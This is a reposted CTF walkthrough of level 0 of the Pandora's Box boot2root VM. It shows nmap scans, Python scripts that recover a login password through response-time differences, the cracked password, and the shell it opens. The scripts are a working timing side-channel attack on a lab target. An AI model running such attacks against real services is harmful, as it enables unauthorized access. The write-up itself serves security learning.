Lab - Pandora's Box
2015-07-19 23:32
429 查看
Description
Pandora’s Box is a boot2root VM written by c0ne. It focuses on binary exploitation and reverse engineering. You have to complete all 5 levels to root the box.The binaries in this challenge are absolutely exquisite and extrememly well put together. I wanted to do rather comprehensive write-up’s for each binary, which would mean a very long article. For this reason, I decided to publish each level as a separate blog post.
Walkthrough
Nmap
lab:pandroa/ $ nmap -v -n -sn 192.168.1.1/24 | grep -B 1 "Host is up" Nmap scan report for 192.168.1.1 Host is up (0.00050s latency). -- Nmap scan report for 192.168.1.100 Host is up (0.00040s latency). -- Nmap scan report for 192.168.1.102 Host is up (0.096s latency). -- Nmap scan report for 192.168.1.106 Host is up (0.00044s latency). -- Nmap scan report for 192.168.1.108 Host is up (0.000048s latency). -- Nmap scan report for 192.168.1.187 Host is up (0.00054s latency).
lab:pandroa/ $ nmap -v -n -p- 192.168.1.106 Starting Nmap 6.47 ( http://nmap.org ) at 2015-07-19 09:14 UTC Initiating Ping Scan at 09:14 Scanning 192.168.1.106 [2 ports] Completed Ping Scan at 09:14, 0.00s elapsed (1 total hosts) Initiating Connect Scan at 09:14 Scanning 192.168.1.106 [65535 ports] Discovered open port 22/tcp on 192.168.1.106 Discovered open port 54311/tcp on 192.168.1.106 Completed Connect Scan at 09:14, 2.15s elapsed (65535 total ports) Nmap scan report for 192.168.1.106 Host is up (0.0069s latency). Not shown: 65533 closed ports PORT STATE SERVICE 22/tcp open ssh 54311/tcp open unknown Read data files from: /usr/bin/../share/nmap Nmap done: 1 IP address (1 host up) scanned in 2.23 seconds
Secure Remote Shell
The service on port 54311 can be connected to using netcat.lab:pandroa/ $ ncat -v 192.168.1.106 54311 Ncat: Version 6.47 ( http://nmap.org/ncat ) Ncat: Connected to 192.168.1.106:54311. ####################### # Secure Remote Shell # ####################### Welcome, please log in Password: pass Invalid password! Password: ^C
A few passwords and some flattery didn’t get me very far.
Password: c0ne r0cks Invalid password!
Whilst testing for overflows, I found that long strings are split and processed.
root@kali:~/vulnhub/pbox/level_0# python -c 'print ("A" * 100)' | nc 192.168.1.106 54311 ####################### # Secure Remote Shell # ####################### Welcome, please log in Password: Invalid password! Password: Invalid password!
I then set out to find the maximum length of the buffer, to determine the maximum theoretical length of the password.
root@kali:~/vulnhub/pbox/level_0# python -c 'print ("A" * 62)' | nc 192.168.1.106 54311 ####################### # Secure Remote Shell # ####################### Welcome, please log in Password: Invalid password! Password:
I did write a python script that would attempt passwords from the rockyou wordlist but nothing popped, and if the password was of any significant length a straight AAAA - ZZZZ bruteforce would take too long.
Time Based Attack
If you send keystrokes manually, you can see there is a difference in the amount of time it takes for the binary to return Invalid password!. The longer the string, the more pronounced the difference is.You may need to watch it a few times to see. But we can confirm there’s a difference by timing it in python.
#!/usr/bin/env python import socket, time target = '192.168.1.106' port = 54311 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target, port)) banner = s.recv(512) prompt = s.recv(512) s.send("A\n") t0 = time.time() response = s.recv(512) prompt = s.recv(512) t1 = time.time() s.send("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n") t2 = time.time() response = s.recv(512) prompt = s.recv(512) t3 = time.time() print "Short: " + str(t1-t0) print "Long: " + str(t3-t2) s.close()
root@kali:~/vulnhub/pbox/level_0# ./level_0.py Short: 0.0451579093933 Long: 0.26290678978
You can see there is a significantly longer wait for the error message to be returned after sending the longer string. We can take this a step further and time the response of a single character.
For just 1 run, the results were a bit hit-and-miss, so it’s better to send a character several times and work out the average response time.
#!/usr/bin/env python import socket, time, string, numpy target = '192.168.1.106' port = 54311 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target, port)) banner = s.recv(512) prompt = s.recv(512) for char in (string.ascii_letters + string.digits + string.punctuation): t0 = time.time() s.send(char + "\n") s.recv(512) t1 = time.time() t2 = time.time() s.send(char + "\n") s.recv(512) t3 = time.time() t4 = time.time() s.send(char + "\n") s.recv(512) t5 = time.time() t6 = time.time() s.send(char + "\n") s.recv(512) t7 = time.time() times = [(t7-t6), (t5-t4), (t3-t2), (t1-t0)] average = numpy.mean(times) print char + ": " + str(average) s.close()
If this is run a few times and sorted on the 2nd column, we can easily see that the letter R is consistently the quickest character to be returned.
root@kali:~/vulnhub/pbox/level_0# ./level_0.py | sort -s -n -k 2,2 | head -n 5 R: 0.00170934200287 d: 0.0026016831398 b: 0.00287199020386 i: 0.00288355350494 g: 0.00291323661804
We can assume therefore, that the password begins with R. Finally, modify the script so that it will automatically move onto the next character to deciper the entire password. We will assume that if the character reponse is quicker than 0.002s, then it’s valid.
#!/usr/bin/env python2 # -*- coding: utf8 -*- import socket import time import string import numpy def single(sock, data): starttime = time.time() sock.send(data) sock.recv(512) endtime = time.time() return endtime - starttime def main(): host = '192.168.1.106' port = 54311 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.recv(512) s.recv(512) password = '' for i in range(80): chars = string.ascii_letters + string.digits + string.punctuation for char in chars: data = "%s%s\n" % (password, char) times = [single(s, data) for i in range(8)] average = numpy.mean(times) # print char + ": " + str(average) if average < 0.002: password = password + char print "[+] password: %s" % password break print "[+] finally password: %s" % password s.close() if __name__ == "__main__": main()
lab:pandroa/ $ python2 crack.py [+] password: R [+] password: R3 [+] password: R3s [+] password: R3sp [+] password: R3sp3 [+] password: R3sp3c [+] password: R3sp3ct [+] password: R3sp3ctY [+] password: R3sp3ctY0 [+] password: R3sp3ctY04 [+] password: R3sp3ctY04r [+] password: R3sp3ctY04r4 [+] password: R3sp3ctY04r4d [+] password: R3sp3ctY04r4dm [+] password: R3sp3ctY04r4dm1 [+] password: R3sp3ctY04r4dm1n [+] password: R3sp3ctY04r4dm1ni [+] password: R3sp3ctY04r4dm1niS [+] password: R3sp3ctY04r4dm1niSt [+] password: R3sp3ctY04r4dm1niSt4 [+] password: R3sp3ctY04r4dm1niSt4t [+] password: R3sp3ctY04r4dm1niSt4t0 [+] password: R3sp3ctY04r4dm1niSt4t0r [+] password: R3sp3ctY04r4dm1niSt4t0rL [+] password: R3sp3ctY04r4dm1niSt4t0rL1 [+] password: R3sp3ctY04r4dm1niSt4t0rL1k [+] password: R3sp3ctY04r4dm1niSt4t0rL1ke [+] password: R3sp3ctY04r4dm1niSt4t0rL1keY [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4 [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3 [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3s [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3sp [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spe [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spec [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spect [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY0 [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04 [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04r [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0 [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0d [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0da [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daa [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaa [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaa [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaa [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaa [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaa [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaa [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaa [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaa [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaa [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaa [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaa [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaa [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaa [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaaa [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaaaa [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaaaaa [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaaaaaa [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaaaaaab [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaaaaaaba [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaaaaaabaa [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaaaaaabaaa [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaaaaaabaaaa [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaaaaaabaaaaa [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaaaaaabaaaaaa [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaaaaaabaaaaaaa [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaaaaaabaaaaaaaa [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaaaaaabaaaaaaaaa [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaaaaaabaaaaaaaaaa [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaaaaaabaaaaaaaaaaa [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaaaaaabaaaaaaaaaaaa [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaaaaaabaaaaaaaaaaaaa [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaaaaaabaaaaaaaaaaaaaa [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaaaaaabaaaaaaaaaaaaaaa [+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaaaaaabaaaaaaaaaaaaaaaa [+] finally password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaaaaaabaaaaaaaaaaaaaaaa
The whole thing derps out when it gets to the end of the valid password, but at least we got it.
lab:pandroa/ $ ncat -v 192.168.1.106 54311 Ncat: Version 6.47 ( http://nmap.org/ncat ) Ncat: Connected to 192.168.1.106:54311. ####################### # Secure Remote Shell # ####################### Welcome, please log in Password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0d Logged in successfully, type exit to close the shell Shell$ id uid=1001(level1) gid=1001(level1) groups=1001(level1) Shell$
References
https://www.vulnhub.com/entry/pandoras-box-1,111/http://rastamouse.me/blog/2015/pandoras-box-1-level-0/
相关文章推荐
- Maximum Depth of Binary Tree
- POJ1405Heritage
- javalock锁的机制
- Linux进程间通信——使用匿名管道
- C#高级编程四十二天----委托和事件
- 【动效设计】常见动效设计分门别类
- HDU3363 Ice-sugar Gourd
- Minimum Depth of Binary Tree
- 查找数据库表的数量
- Java中HTTP通信
- Linux进程间通信——使用命名管道
- Swift 与 JSON 数据
- HTTP协议(二)之HTTP请求
- Same Tree
- L4:二维数组、数组类、数组值复制、冒泡排序、二分查找
- web.xml 详细介绍
- Linux进程间通信——使用信号量
- SSIS数据流性能比较(ADO.NET vs. OLE DB vs. ODBC)
- 解析View中的MeasureSpec
- SSIS数据流性能比较(ADO.NET vs. OLE DB vs. ODBC)